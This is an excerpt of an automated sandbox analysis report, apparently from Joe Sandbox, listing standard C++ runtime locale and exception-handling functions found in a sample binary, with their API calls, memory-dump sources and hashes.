                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: FontGdip$Family$CreateDelete$GenericSansSerif$FromName
                                • String ID: Arial
                                • API String ID: 778451959-493054409
                                • Opcode ID: 5c26adeb644eb546e83f6da1232f65c2aff8f5eb5dad50e615ba98e2f54c7368
                                • Instruction ID: 2b93083f641ebe4919f66077f20c57abdc533cb4a836b56b1f36a8212e8c19f9
                                • Opcode Fuzzy Hash: 5c26adeb644eb546e83f6da1232f65c2aff8f5eb5dad50e615ba98e2f54c7368
                                • Instruction Fuzzy Hash: 41316BB4700206BBD7209FA5ED04B5AFBB9FB44701F00C65EE94597390DB74D800CB94
                                Function 0066202B Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00662032
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0066203C
                                • int.LIBCPMT ref: 00662053
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • moneypunct.LIBCPMT ref: 00662076
                                • std::bad_exception::bad_exception.LIBCMT ref: 0066208A
                                • __CxxThrowException@8.LIBCMT ref: 00662098
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 006620AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: Xs$bad cast
                                • API String ID: 2090539961-3260119552
                                • Opcode ID: 49a4995d311e5a88e06176a56a8423239daced5f485f8219e0fb6a7b49904bbc
                                • Instruction ID: 8bc1f1f8a79de84126f0be9b71d47aaa7b8798e2a25d6427c0638307c24f1ce6
                                • Opcode Fuzzy Hash: 49a4995d311e5a88e06176a56a8423239daced5f485f8219e0fb6a7b49904bbc
                                • Instruction Fuzzy Hash: 6A01C03190021A9BCB09EBB0C862AFD7727AF40721F14011DF9117B2D1DF78AA458799
                                Function 0066103F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00661046
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00661050
                                • int.LIBCPMT ref: 00661067
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • numpunct.LIBCPMT ref: 0066108A
                                • std::bad_exception::bad_exception.LIBCMT ref: 0066109E
                                • __CxxThrowException@8.LIBCMT ref: 006610AC
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 006610C2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrownumpunctstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: ,s$bad cast
                                • API String ID: 1289509941-831669854
                                • Opcode ID: 5693cccb49d185a93962ed605ff57d4b49cdebb7c3cd7e815f5ad86a0a6e7c4b
                                • Instruction ID: 0df5e830d0d88d29cf1e4febdbdb9ac07aa64a03b9cc06a36e04746fc23b24f3
                                • Opcode Fuzzy Hash: 5693cccb49d185a93962ed605ff57d4b49cdebb7c3cd7e815f5ad86a0a6e7c4b
                                • Instruction Fuzzy Hash: C901AD319002099BCF05EBB0D842AFE7737AF41721F14021DF9107B2D1CF78AA859B99
                                Function 00661216 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 0066121D
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00661227
                                • int.LIBCPMT ref: 0066123E
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • codecvt.LIBCPMT ref: 00661261
                                • std::bad_exception::bad_exception.LIBCMT ref: 00661275
                                • __CxxThrowException@8.LIBCMT ref: 00661283
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00661299
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: Ps$bad cast
                                • API String ID: 1676052248-4043858998
                                • Opcode ID: 7ee40cf687ccc232ac78faa6488d8f27d910a1d7159bc6563c24aa4580b98fbc
                                • Instruction ID: 65fcd92fad2f35417c3666b5d0beb1e3420dbb5c15982c1203fa4e6e078486a3
                                • Opcode Fuzzy Hash: 7ee40cf687ccc232ac78faa6488d8f27d910a1d7159bc6563c24aa4580b98fbc
                                • Instruction Fuzzy Hash: 4C01C4329002099BCB45EBB4D863AFE7727AF41721F14051DF510BB2E1DF789A458798
                                Function 00660ABA Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00660AC1
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00660ACB
                                • int.LIBCPMT ref: 00660AE2
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • codecvt.LIBCPMT ref: 00660B05
                                • std::bad_exception::bad_exception.LIBCMT ref: 00660B19
                                • __CxxThrowException@8.LIBCMT ref: 00660B27
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660B3D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: $s$bad cast
                                • API String ID: 1676052248-46880872
                                • Opcode ID: 0748360e88f843926f8c9301fcffb5f6df90545b1e5baa60d920f059cbb9958d
                                • Instruction ID: 1a9006e3bd87e226f6bc65dbfa9752c7e2ad6cece43d362f7ef8d7d1ba3134bc
                                • Opcode Fuzzy Hash: 0748360e88f843926f8c9301fcffb5f6df90545b1e5baa60d920f059cbb9958d
                                • Instruction Fuzzy Hash: E601A131900209ABDB05EBB4D856AFE7727AF40721F14052DF9107B2D1DF78AA458799
                                Function 00660B57 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00660B5E
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00660B68
                                • int.LIBCPMT ref: 00660B7F
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • codecvt.LIBCPMT ref: 00660BA2
                                • std::bad_exception::bad_exception.LIBCMT ref: 00660BB6
                                • __CxxThrowException@8.LIBCMT ref: 00660BC4
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660BDA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: Ts$bad cast
                                • API String ID: 1676052248-3903122221
                                • Opcode ID: 7f94dd489577bf17cb85d4fe765de91afa4fa519e0d327fd39741d0fbe8d3516
                                • Instruction ID: af4e60c12aeaf962f4c0288f3940a1d10f9be851f33365a693c0c0bec59fc542
                                • Opcode Fuzzy Hash: 7f94dd489577bf17cb85d4fe765de91afa4fa519e0d327fd39741d0fbe8d3516
                                • Instruction Fuzzy Hash: CC010C319002099BCB04EBB0C843AFE7737AF80720F24452DF9117B2D0CF78AA458B99
                                Function 00661350 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00661357
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00661361
                                • int.LIBCPMT ref: 00661378
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • codecvt.LIBCPMT ref: 0066139B
                                • std::bad_exception::bad_exception.LIBCMT ref: 006613AF
                                • __CxxThrowException@8.LIBCMT ref: 006613BD
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 006613D3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast$s
                                • API String ID: 1676052248-2723258968
                                • Opcode ID: afb5ecc2575a5adfea31e7c66913a9c456e5392f4d6ee640d794f469bcc7f808
                                • Instruction ID: 57e56e6d8e0f1695fc427f6be8448a9c063f787741c9c188896c8afade79b362
                                • Opcode Fuzzy Hash: afb5ecc2575a5adfea31e7c66913a9c456e5392f4d6ee640d794f469bcc7f808
                                • Instruction Fuzzy Hash: 70018B319002199BCB05EBA0D852AFE7727AF81721F18061DF9117B2D1DF78AA059798
                                Function 00660BF4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00660BFB
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00660C05
                                • int.LIBCPMT ref: 00660C1C
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • numpunct.LIBCPMT ref: 00660C3F
                                • std::bad_exception::bad_exception.LIBCMT ref: 00660C53
                                • __CxxThrowException@8.LIBCMT ref: 00660C61
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660C77
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrownumpunctstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: 8s$bad cast
                                • API String ID: 1289509941-1317860649
                                • Opcode ID: 061a030e41178a4658ab4cc0ba54e9df5a3fa119c5915864ca55eff7afdabd43
                                • Instruction ID: 4f2765b0051dfa8d7b0567d96e760eeb71f69e2781326fe1bb697f60c6780371
                                • Opcode Fuzzy Hash: 061a030e41178a4658ab4cc0ba54e9df5a3fa119c5915864ca55eff7afdabd43
                                • Instruction Fuzzy Hash: 3501CC319002099BDB05EBB0C853AFE7737AF40720F24062DF9107B2D1CF78AA058798
                                Function 00660C91 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00660C98
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00660CA2
                                • int.LIBCPMT ref: 00660CB9
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • messages.LIBCPMT ref: 00660CDC
                                • std::bad_exception::bad_exception.LIBCMT ref: 00660CF0
                                • __CxxThrowException@8.LIBCMT ref: 00660CFE
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660D14
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmessagesstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: s$bad cast
                                • API String ID: 2525416601-459790195
                                • Opcode ID: a24ecfdb47ee5fa40ea1ea6c63db1dd06a1527edb559708be50f65575bdce32d
                                • Instruction ID: 4a612209761c11d6562e52499b9fa74223c979907fb66fed0c24bf1a05f28b51
                                • Opcode Fuzzy Hash: a24ecfdb47ee5fa40ea1ea6c63db1dd06a1527edb559708be50f65575bdce32d
                                • Instruction Fuzzy Hash: CA01CC319002199BDB05EFB0D852AFE7727AF80721F24062DF9117B2D1DF78AA058799
                                Function 00660D2E Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00660D35
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00660D3F
                                • int.LIBCPMT ref: 00660D56
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • codecvt.LIBCPMT ref: 00660D79
                                • std::bad_exception::bad_exception.LIBCMT ref: 00660D8D
                                • __CxxThrowException@8.LIBCMT ref: 00660D9B
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660DB1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: Hs$bad cast
                                • API String ID: 1676052248-2766358124
                                • Opcode ID: c77c88663a81961ac4b4bcdd1a7f8541330bf35f75c85463d7daf81c1b7accbe
                                • Instruction ID: 7eb601f0c4556ecb9a502d90031654fa5cc79b68905a21576a1b12cdfa35a103
                                • Opcode Fuzzy Hash: c77c88663a81961ac4b4bcdd1a7f8541330bf35f75c85463d7daf81c1b7accbe
                                • Instruction Fuzzy Hash: 9D01C0329002199BDB45EBF0C842AFE7727AF41720F24062DF9107B2D1CF78AA458798
                                Function 00660DCB Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00660DD2
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00660DDC
                                • int.LIBCPMT ref: 00660DF3
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • codecvt.LIBCPMT ref: 00660E16
                                • std::bad_exception::bad_exception.LIBCMT ref: 00660E2A
                                • __CxxThrowException@8.LIBCMT ref: 00660E38
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660E4E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: Ls$bad cast
                                • API String ID: 1676052248-3176122743
                                • Opcode ID: c9b3c347da9064dbf25a681a4b6107bdfb1519369fd3a76915e202b1ff75c44d
                                • Instruction ID: 17ced3e44a39ed584e9c3629aaf477a4db3253c931fc3b638ff4d1c2738002ff
                                • Opcode Fuzzy Hash: c9b3c347da9064dbf25a681a4b6107bdfb1519369fd3a76915e202b1ff75c44d
                                • Instruction Fuzzy Hash: C501C0319002199BDB05EBB0D842AFEB737AF40720F14092DF9107B2D1CF79AE058B98
                                Function 00661DB7 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00661DBE
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00661DC8
                                • int.LIBCPMT ref: 00661DDF
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • moneypunct.LIBCPMT ref: 00661E02
                                • std::bad_exception::bad_exception.LIBCMT ref: 00661E16
                                • __CxxThrowException@8.LIBCMT ref: 00661E24
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00661E3A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: (s$bad cast
                                • API String ID: 2090539961-675203397
                                • Opcode ID: 4ce269fcd79ae2fc4ee66c9133573e6bea539d8048f828f84ebed05782fd9282
                                • Instruction ID: 6f0b6934e5ed281edfa4cf609e25540507ec667aa5cb600c644da0019951ea24
                                • Opcode Fuzzy Hash: 4ce269fcd79ae2fc4ee66c9133573e6bea539d8048f828f84ebed05782fd9282
                                • Instruction Fuzzy Hash: 7101AD319002199BCB05EBB0D842AFE7727BF81721F28052DF9107F2D1DF78AA059799
                                Function 00660F05 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00660F0C
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00660F16
                                • int.LIBCPMT ref: 00660F2D
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • codecvt.LIBCPMT ref: 00660F50
                                • std::bad_exception::bad_exception.LIBCMT ref: 00660F64
                                • __CxxThrowException@8.LIBCMT ref: 00660F72
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660F88
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: Ds$bad cast
                                • API String ID: 1676052248-2383861569
                                • Opcode ID: 65b0fba08a841e94c489b1cfa6f24ea9cd175dca165af7a6776295212673ef5b
                                • Instruction ID: b932a4bdbba5e2849cce7b04d7fd933dd7153ef9357b4ca52374f743421ad7ab
                                • Opcode Fuzzy Hash: 65b0fba08a841e94c489b1cfa6f24ea9cd175dca165af7a6776295212673ef5b
                                • Instruction Fuzzy Hash: 3301C031900219ABDB05EBB0D942AFE7737AF40721F14052DF9117B2D1DF78AA858799
                                Function 006697DD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 006697E4
                                • std::_Lockit::_Lockit.LIBCPMT ref: 006697EE
                                • int.LIBCPMT ref: 00669805
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • collate.LIBCPMT ref: 00669828
                                • std::bad_exception::bad_exception.LIBCMT ref: 0066983C
                                • __CxxThrowException@8.LIBCMT ref: 0066984A
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00669860
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
